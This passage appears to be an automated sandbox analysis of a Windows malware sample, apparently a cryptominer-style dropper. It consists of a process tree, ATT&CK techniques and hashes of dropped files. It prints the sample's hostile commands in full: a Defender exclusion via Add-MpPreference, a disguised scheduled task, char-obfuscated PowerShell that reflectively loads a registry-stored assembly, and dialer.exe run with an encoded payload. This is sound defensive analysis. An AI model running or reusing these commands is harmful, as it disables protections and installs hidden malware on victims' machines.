C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#waqsnj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "WindowsDefenderSmartScreenQC" } Else { "C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe" }
2⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:1252

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn WindowsDefenderSmartScreenQC
3⤵
PID:1964

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
2⤵
- Drops file in Program Files directory
PID:808

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
3⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:956

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
2⤵
- Drops file in Program Files directory
PID:1868

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe dazvaqbeggbsgujt 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
2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1928

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
PID:2144

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:484

C:\Windows\system32\taskeng.exe
taskeng.exe {D7C89AD2-7975-42B5-819C-D486BF918E54} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Loads dropped DLL
PID:1076

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'T'+'W'+''+'A'+''+'R'+''+[Char](69)+'').GetValue(''+[Char](100)+''+[Char](105)+''+'a'+'l'+'e'+''+[Char](114)+''+'s'+'t'+'a'+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1376

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+'F'+''+[Char](84)+''+'W'+''+[Char](65)+''+[Char](82)+'E').GetValue('d'+'i'+''+'a'+'l'+[Char](101)+''+'r'+''+[Char](115)+''+[Char](116)+'a'+[Char](103)+''+'e'+'r')).EntryPoint.Invoke($Null,$Null)
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:568

C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe
"C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:1728

C:\Windows\system32\taskeng.exe
taskeng.exe {CB5C2ADD-F467-47FC-8C54-D6570DBF9393} S-1-5-21-2292972927-2705560509-2768824231-1000:GRXNNIIE\Admin:Interactive:[1]
1⤵
PID:2268

C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
2⤵
PID:2364

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

T1064

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

Scripting

T1064

Credential Access

Credentials in Files

T1081

Discovery

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Libs\g.log
Filesize
198B

MD5
37dd19b2be4fa7635ad6a2f3238c4af1

SHA1
e5b2c034636b434faee84e82e3bce3a3d3561943

SHA256
8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07

SHA512
86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5

Download Submit
C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe
Filesize
3.7MB

MD5
e2fb72e358e13e40ae8327c3a9df8165

SHA1
b40aceed9393e3d4c289b2cf477dd5dee76a39da

SHA256
d6516a119c2c08859883d95f97b0bd4b2fb8fbad7d7fae6ed2d79b447177d408

SHA512
b209805a5194ccf70a97a57685a1765bb1ef15480994a2737084805fa21f79a285a5a1f98d0857051bc03ad98a2c90d81b33bb49cde1e955ba9898e86d8697e9

Download Submit
C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe
Filesize
3.7MB

MD5
e2fb72e358e13e40ae8327c3a9df8165

SHA1
b40aceed9393e3d4c289b2cf477dd5dee76a39da

SHA256
d6516a119c2c08859883d95f97b0bd4b2fb8fbad7d7fae6ed2d79b447177d408

SHA512
b209805a5194ccf70a97a57685a1765bb1ef15480994a2737084805fa21f79a285a5a1f98d0857051bc03ad98a2c90d81b33bb49cde1e955ba9898e86d8697e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
Filesize
3.7MB

MD5
e2fb72e358e13e40ae8327c3a9df8165

SHA1
b40aceed9393e3d4c289b2cf477dd5dee76a39da

SHA256
d6516a119c2c08859883d95f97b0bd4b2fb8fbad7d7fae6ed2d79b447177d408

SHA512
b209805a5194ccf70a97a57685a1765bb1ef15480994a2737084805fa21f79a285a5a1f98d0857051bc03ad98a2c90d81b33bb49cde1e955ba9898e86d8697e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
Filesize
3.7MB

MD5
e2fb72e358e13e40ae8327c3a9df8165

SHA1
b40aceed9393e3d4c289b2cf477dd5dee76a39da

SHA256
d6516a119c2c08859883d95f97b0bd4b2fb8fbad7d7fae6ed2d79b447177d408

SHA512
b209805a5194ccf70a97a57685a1765bb1ef15480994a2737084805fa21f79a285a5a1f98d0857051bc03ad98a2c90d81b33bb49cde1e955ba9898e86d8697e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
Filesize
3.7MB

MD5
e2fb72e358e13e40ae8327c3a9df8165

SHA1
b40aceed9393e3d4c289b2cf477dd5dee76a39da

SHA256
d6516a119c2c08859883d95f97b0bd4b2fb8fbad7d7fae6ed2d79b447177d408

SHA512
b209805a5194ccf70a97a57685a1765bb1ef15480994a2737084805fa21f79a285a5a1f98d0857051bc03ad98a2c90d81b33bb49cde1e955ba9898e86d8697e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
Filesize
3.7MB

MD5
e2fb72e358e13e40ae8327c3a9df8165

SHA1
b40aceed9393e3d4c289b2cf477dd5dee76a39da

SHA256
d6516a119c2c08859883d95f97b0bd4b2fb8fbad7d7fae6ed2d79b447177d408

SHA512
b209805a5194ccf70a97a57685a1765bb1ef15480994a2737084805fa21f79a285a5a1f98d0857051bc03ad98a2c90d81b33bb49cde1e955ba9898e86d8697e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
Filesize
3.7MB

MD5
e2fb72e358e13e40ae8327c3a9df8165

SHA1
b40aceed9393e3d4c289b2cf477dd5dee76a39da

SHA256
d6516a119c2c08859883d95f97b0bd4b2fb8fbad7d7fae6ed2d79b447177d408

SHA512
b209805a5194ccf70a97a57685a1765bb1ef15480994a2737084805fa21f79a285a5a1f98d0857051bc03ad98a2c90d81b33bb49cde1e955ba9898e86d8697e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
C:\Users\Admin\AppData\Local\Temp\new2.exe
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\Users\Admin\AppData\Local\Temp\new2.exe
Filesize
674KB

MD5
25efca5920d6608517e68c85a932ed7f

SHA1
04421b033c3ba1fed354e2a36503d8b192083979

SHA256
a6ab90d5445d7ff822f3d9401ab6c438e624d416575d68be8eb4336f3c41c9dd

SHA512
917d0ec98166454eb13d3e40a8ff6c2fc0f0a793896663b8905828162e42d821eebd38ac520429f0e3bec58df1cfb287a28545983437b1405b6721e048f5ddec

Download Submit
C:\Users\Admin\AppData\Local\Temp\new2.exe
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\Users\Admin\AppData\Local\Temp\new2.exe
Filesize
674KB

MD5
25efca5920d6608517e68c85a932ed7f

SHA1
04421b033c3ba1fed354e2a36503d8b192083979

SHA256
a6ab90d5445d7ff822f3d9401ab6c438e624d416575d68be8eb4336f3c41c9dd

SHA512
917d0ec98166454eb13d3e40a8ff6c2fc0f0a793896663b8905828162e42d821eebd38ac520429f0e3bec58df1cfb287a28545983437b1405b6721e048f5ddec

Download Submit
C:\Users\Admin\AppData\Local\Temp\new2.exe
Filesize
674KB

MD5
25efca5920d6608517e68c85a932ed7f

SHA1
04421b033c3ba1fed354e2a36503d8b192083979

SHA256
a6ab90d5445d7ff822f3d9401ab6c438e624d416575d68be8eb4336f3c41c9dd

SHA512
917d0ec98166454eb13d3e40a8ff6c2fc0f0a793896663b8905828162e42d821eebd38ac520429f0e3bec58df1cfb287a28545983437b1405b6721e048f5ddec

Download Submit
C:\Users\Admin\AppData\Local\Temp\new2.exe
Filesize
674KB

MD5
25efca5920d6608517e68c85a932ed7f

SHA1
04421b033c3ba1fed354e2a36503d8b192083979

SHA256
a6ab90d5445d7ff822f3d9401ab6c438e624d416575d68be8eb4336f3c41c9dd

SHA512
917d0ec98166454eb13d3e40a8ff6c2fc0f0a793896663b8905828162e42d821eebd38ac520429f0e3bec58df1cfb287a28545983437b1405b6721e048f5ddec

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
ba720fefa27459d8526939000fbe46a5

SHA1
161ce91b4ddbad7dc2e950d170c2a319f7830ada

SHA256
04e0fb88701bddae5df2daba21a155d1e69f88010491183f46e6aca843c4ead1

SHA512
bd8ec105a484af226e67729aee58765688cda264bb4da3b8d4871eb256dcff1985e49db05d6825536021cd61219dc3fd8b8e4e2804cef181ff0cac8f6adc67cd

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
ba720fefa27459d8526939000fbe46a5

SHA1
161ce91b4ddbad7dc2e950d170c2a319f7830ada

SHA256
04e0fb88701bddae5df2daba21a155d1e69f88010491183f46e6aca843c4ead1

SHA512
bd8ec105a484af226e67729aee58765688cda264bb4da3b8d4871eb256dcff1985e49db05d6825536021cd61219dc3fd8b8e4e2804cef181ff0cac8f6adc67cd

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
ba720fefa27459d8526939000fbe46a5

SHA1
161ce91b4ddbad7dc2e950d170c2a319f7830ada

SHA256
04e0fb88701bddae5df2daba21a155d1e69f88010491183f46e6aca843c4ead1

SHA512
bd8ec105a484af226e67729aee58765688cda264bb4da3b8d4871eb256dcff1985e49db05d6825536021cd61219dc3fd8b8e4e2804cef181ff0cac8f6adc67cd

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
ba720fefa27459d8526939000fbe46a5

SHA1
161ce91b4ddbad7dc2e950d170c2a319f7830ada

SHA256
04e0fb88701bddae5df2daba21a155d1e69f88010491183f46e6aca843c4ead1

SHA512
bd8ec105a484af226e67729aee58765688cda264bb4da3b8d4871eb256dcff1985e49db05d6825536021cd61219dc3fd8b8e4e2804cef181ff0cac8f6adc67cd

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
ba720fefa27459d8526939000fbe46a5

SHA1
161ce91b4ddbad7dc2e950d170c2a319f7830ada

SHA256
04e0fb88701bddae5df2daba21a155d1e69f88010491183f46e6aca843c4ead1

SHA512
bd8ec105a484af226e67729aee58765688cda264bb4da3b8d4871eb256dcff1985e49db05d6825536021cd61219dc3fd8b8e4e2804cef181ff0cac8f6adc67cd

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
ba720fefa27459d8526939000fbe46a5

SHA1
161ce91b4ddbad7dc2e950d170c2a319f7830ada

SHA256
04e0fb88701bddae5df2daba21a155d1e69f88010491183f46e6aca843c4ead1

SHA512
bd8ec105a484af226e67729aee58765688cda264bb4da3b8d4871eb256dcff1985e49db05d6825536021cd61219dc3fd8b8e4e2804cef181ff0cac8f6adc67cd

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
213b40f9b7becce58939d23410d9897c

SHA1
e4d0f7bf2d706772a66b1f6eded74e63f5be664e

SHA256
90a33fbfa9bb68c9eedb78b5973cc501c9d528926988c519f67496e2e31bd9f9

SHA512
160870697bbcd04d1bf6b07ec9b407ded5f092e9e96263ce96bb5443f9624caa6e20c382b81c8715a46c99f6fe2e13def4dd727a33c5c8500e0977bba7332f9b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
213b40f9b7becce58939d23410d9897c

SHA1
e4d0f7bf2d706772a66b1f6eded74e63f5be664e

SHA256
90a33fbfa9bb68c9eedb78b5973cc501c9d528926988c519f67496e2e31bd9f9

SHA512
160870697bbcd04d1bf6b07ec9b407ded5f092e9e96263ce96bb5443f9624caa6e20c382b81c8715a46c99f6fe2e13def4dd727a33c5c8500e0977bba7332f9b

Download Submit
C:\Windows\System32\Tasks\Telemetry Logging
Filesize
3KB

MD5
0d623ff5e264a1a049552075b96f940d

SHA1
7fb57298e46aa68f28f286bb7233332e45a14e76

SHA256
948c5aa48ca261b0c743cb45009e8dc8a77f52739e1949b981ce576e80c11862

SHA512
20c0ceba29d2c7eac07528f527603a484926f7fa9071ba1da75dd4b6f762f9007251d30baff44ae062b8acdbcd3d0a5fa22ccc0d29c37454d13d74ef39d655a7

Download Submit
C:\Windows\System32\drivers\etc\hosts
Filesize
2KB

MD5
4ac8a26e2cee1347880edccb47ab30ea

SHA1
a629f6d453014c9dccb98987e1f4b0a3d4bdd460

SHA256
de574c85b289f23bba4b932a4c48397c4c61904cb6df086726dd7f8049624c3a

SHA512
fc2af80b2e84ae114ae06144b9ec41eed50250e20f18db3d114ac8d2c59ebbfcd440f59d12f173ea6a94bcf394b0cecee9e120265112b7043bf9e2bd636d6a8a

Download Submit
C:\Windows\System32\drivers\etc\hosts
Filesize
2KB

MD5
4ac8a26e2cee1347880edccb47ab30ea

SHA1
a629f6d453014c9dccb98987e1f4b0a3d4bdd460

SHA256
de574c85b289f23bba4b932a4c48397c4c61904cb6df086726dd7f8049624c3a

SHA512
fc2af80b2e84ae114ae06144b9ec41eed50250e20f18db3d114ac8d2c59ebbfcd440f59d12f173ea6a94bcf394b0cecee9e120265112b7043bf9e2bd636d6a8a

Download Submit
C:\Windows\System32\drivers\etc\hosts
Filesize
2KB

MD5
4ac8a26e2cee1347880edccb47ab30ea

SHA1
a629f6d453014c9dccb98987e1f4b0a3d4bdd460

SHA256
de574c85b289f23bba4b932a4c48397c4c61904cb6df086726dd7f8049624c3a

SHA512
fc2af80b2e84ae114ae06144b9ec41eed50250e20f18db3d114ac8d2c59ebbfcd440f59d12f173ea6a94bcf394b0cecee9e120265112b7043bf9e2bd636d6a8a

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
